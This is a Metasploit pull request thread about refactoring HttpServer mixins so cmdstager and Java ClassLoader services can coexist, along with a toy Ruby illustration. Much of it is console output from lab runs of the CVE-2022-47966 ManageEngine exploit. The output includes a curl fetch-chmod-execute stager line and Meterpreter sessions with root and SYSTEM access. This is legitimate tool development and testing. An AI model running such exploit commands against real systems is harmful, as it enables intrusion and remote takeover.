
Allow multiple HttpServer services to coexist in a module

Open cdelafuente-r7 opened this issue 1 year ago • 1 comment

Adding multiple HttpServer services in a module is sometimes complex since they share the same methods. This usually causes issues like this, where #on_request_uri needs to be overridden to handle requests coming from each service.

This PR is an attempt to fix this by making the common methods used by the HttpServer service unique. These methods are:

  • start_service
  • on_request_uri
  • resource_uri

For now, I updated the cmdstager and the Java HTTP ClassLoader mixins, since these are commonly used in the same module. The multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module has been updated to be compatible with these changes. The override of on_request_uri is not necessary anymore and has been removed.

I left this PR as a draft since other modules will need to be updated (those using the Java HTTP ClassLoader). But I wanted to get feedback before moving forward.

How to test

The best way to test this is to install the vulnerable application (instructions can be found here) and test target 0 (Java (in-memory)), target 1 (Windows EXE Dropper) and target 4 (Linux Dropper). They all should work as expected.

Scenarios

ManageEngine ServiceDesk Plus version 14003 on Ubuntu 20.04.4

Target 0 (Java (in-memory))

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.128.1:8080/ZsavWaZESNHRpE/
[*] GET /ZsavWaZESNHRpE/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /ZsavWaZESNHRpE/metasploit.dat requested
[+] Sending 200
[*] GET /ZsavWaZESNHRpE/metasploit.dat requested
[+] Sending the payload configuration data
[*] GET /ZsavWaZESNHRpE/javapayload/stage/Shell.class requested
[+] Sending additional payload class: javapayload/stage/Shell.class
[*] GET /ZsavWaZESNHRpE/javapayload/stage/Stage.class requested
[+] Sending additional payload class: javapayload/stage/Stage.class
[*] GET /ZsavWaZESNHRpE/javapayload/stage/StreamForwarder.class requested
[+] Sending additional payload class: javapayload/stage/StreamForwarder.class
[*] Command shell session 1 opened (192.168.128.1:4444 -> 192.168.128.187:59514) at 2024-02-13 16:02:21 +0100
[*] Exploit completed.
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)

Target 4 (Linux Dropper)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 4
target => 4
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.128.1:8080/WjgySU59DILnpv
[*] Generated command stager: ["curl -so /tmp/SrxbFAqg http://192.168.128.1:8080/WjgySU59DILnpv;chmod +x /tmp/SrxbFAqg;/tmp/SrxbFAqg;rm -f /tmp/SrxbFAqg"]
[*] Client 192.168.128.187 (curl/7.68.0) requested /WjgySU59DILnpv
[*] Sending payload to 192.168.128.187 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.128.187
[*] Meterpreter session 2 opened (192.168.128.1:4444 -> 192.168.128.187:41398) at 2024-02-13 16:03:33 +0100
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter >

ManageEngine ServiceDesk Plus version 14003 on Windows Server 2019

Target 1 (Windows EXE Dropper)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 1
target => 1
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.188 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQA...[SNIP]...
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.128.188
[*] Meterpreter session 3 opened (192.168.128.1:4444 -> 192.168.128.188:50309) at 2024-02-13 16:12:48 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter >

cdelafuente-r7 avatar Feb 13 '24 15:02 cdelafuente-r7
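The collision the PR description refers to, shown as an added example that is not code from the PR or from the framework: two HttpServer-style mixins that both define start_service, on_request_uri and resource_uri, included into one module, versus the same two mixins with per-service method names. ToyHttpServer, SharedCmdStager, SharedClassLoader, UniqueCmdStager and UniqueClassLoader are invented stand-ins for this illustration; the real HttpServer mixin registers resources differently, but the Ruby method-resolution behaviour is the same.

```ruby
# Added example (not Metasploit code): a toy model of why two HttpServer-based
# mixins that both define start_service / on_request_uri / resource_uri cannot
# coexist in one module, and how per-service method names fix it. Every name
# below (ToyHttpServer, SharedCmdStager, UniqueClassLoader, ...) is invented
# for this illustration and does not exist in the framework.

# A request as the toy server sees it (constructed input for the example).
Request = Struct.new(:verb, :path)

# Stand-in for the HttpServer resource table: path prefix => handler.
class ToyHttpServer
  def initialize
    @resources = {}
  end

  # Register +handler+ for every request whose path starts with +prefix+.
  def add_resource(prefix, handler)
    @resources[prefix] = handler
  end

  # Route to the longest matching prefix, or answer 404.
  def handle(req)
    prefix = @resources.keys.select { |p| req.path.start_with?(p) }.max_by(&:length)
    prefix ? @resources[prefix].call(req) : "404 #{req.path}"
  end
end

# --- Before: both mixins use the same three method names -------------------
module SharedCmdStager
  def resource_uri; '/stager'; end
  def on_request_uri(req); "cmdstager payload for #{req.path}"; end
  def start_service(srv); srv.add_resource(resource_uri, method(:on_request_uri)); end
end

module SharedClassLoader
  def resource_uri; '/classes/'; end
  def on_request_uri(req); "class file for #{req.path}"; end
  def start_service(srv); srv.add_resource(resource_uri, method(:on_request_uri)); end
end

# Ruby resolves each shared name to the last-included module, so the
# cmdstager definitions are shadowed and unreachable through the instance.
class SharedExploit
  include SharedCmdStager
  include SharedClassLoader
end

# Which module's on_request_uri the exploit instance actually calls.
def shared_owner
  SharedExploit.instance_method(:on_request_uri).owner
end

# Start "both" services the shared way and serve each path once.
def shared_dispatch(paths)
  srv = ToyHttpServer.new
  SharedExploit.new.start_service(srv)   # only one resource ever registered
  paths.map { |p| srv.handle(Request.new('GET', p)) }
end

# --- After: each service owns uniquely named methods ------------------------
module UniqueCmdStager
  def cmdstager_resource_uri; '/stager'; end
  def cmdstager_on_request_uri(req); "cmdstager payload for #{req.path}"; end
  def start_cmdstager_service(srv)
    srv.add_resource(cmdstager_resource_uri, method(:cmdstager_on_request_uri))
  end
end

module UniqueClassLoader
  def classloader_resource_uri; '/classes/'; end
  def classloader_on_request_uri(req); "class file for #{req.path}"; end
  def start_classloader_service(srv)
    srv.add_resource(classloader_resource_uri, method(:classloader_on_request_uri))
  end
end

# No module-level override needed: both handlers survive inclusion and both
# get registered against their own resource path.
class UniqueExploit
  include UniqueCmdStager
  include UniqueClassLoader
end

def unique_dispatch(paths)
  srv = ToyHttpServer.new
  mod = UniqueExploit.new
  mod.start_cmdstager_service(srv)
  mod.start_classloader_service(srv)
  paths.map { |p| srv.handle(Request.new('GET', p)) }
end

if __FILE__ == $PROGRAM_NAME
  paths = ['/stager', '/classes/metasploit/Payload.class']
  puts "shared: #{shared_dispatch(paths).inspect}"
  puts "unique: #{unique_dispatch(paths).inspect}"
end
```

With the shared names, the stager path is never registered because resource_uri, on_request_uri and start_service all resolve to the last-included module; the only way a module author could reach the stager handler was to override on_request_uri and route by path. With unique names, each mixin's start method registers its own path and handler, which is the shape of the change the PR makes to the CmdStager and Java HTTP ClassLoader mixins.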

Thanks, looks good to me. Wondering if we should have a lint check for method overrides on certain "protected method calls" like start_service to avoid having to do passes like this every once in a while

sempervictus avatar Feb 20 '24 21:02 sempervictus

Thanks @sempervictus ! Sorry for the delay, I'm just returning to this PR now.

This is actually a good idea. Maybe a rubocop rule. The problem is that other protocols use start_service (LDAP server, SMB server, TFTP server, etc.) and we will need to think about a strategy to avoid too many changes in the libraries. For now, this PR just addresses issues with CmdStager and Java HTTP ClassLoader, which have been commonly used together in the same module.

cdelafuente-r7 avatar Jun 14 '24 11:06 cdelafuente-r7

Great fix Christophe. Seems to me like you've covered all the necessary refactoring and testing was as expected 👍

Java (in-memory)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/blH2Q6lkhkg8l2/
[*] Sending stage (57971 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:52314) at 2024-06-17 13:32:23 -0700
[*] Server stopped.

meterpreter > getuid
Server username: DESKTOP-N3ORU31$
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
meterpreter >

Windows EXE Dropper

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 1
target => 1
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.135:52329) at 2024-06-17 13:38:47 -0700
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Windows Command

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 2
target => 2
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 172.16.199.135
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.135:52332) at 2024-06-17 13:42:40 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Unix Command

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
target => 3
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24772 bytes) to 172.16.199.131
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.131:46306) at 2024-06-17 14:21:12 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : msfuser-virtual-machine
OS              : Linux 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2
Architecture    : x64
System Language : en_CA
Meterpreter     : python/linux
meterpreter > exit

Linux Dropper

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 4
target => 4
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/ZzdM1sy
[*] Client 172.16.199.131 (curl/7.81.0) requested /ZzdM1sy
[*] Sending payload to 172.16.199.131 (curl/7.81.0)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 5 opened (172.16.199.1:4444 -> 172.16.199.131:39252) at 2024-06-17 14:21:35 -0700
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.131
OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

jheysel-r7 avatar Jun 18 '24 16:06 jheysel-r7

Release Notes

Adding multiple HttpServer services in a module is sometimes complex since they share the same methods. This usually causes issues where #on_request_uri needs to be overridden to handle requests coming from each service. This updates the cmdstager and the Java HTTP ClassLoader mixins, since these are commonly used in the same module. This also updates the manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module to make use of these new changes.

jheysel-r7 avatar Jun 18 '24 16:06 jheysel-r7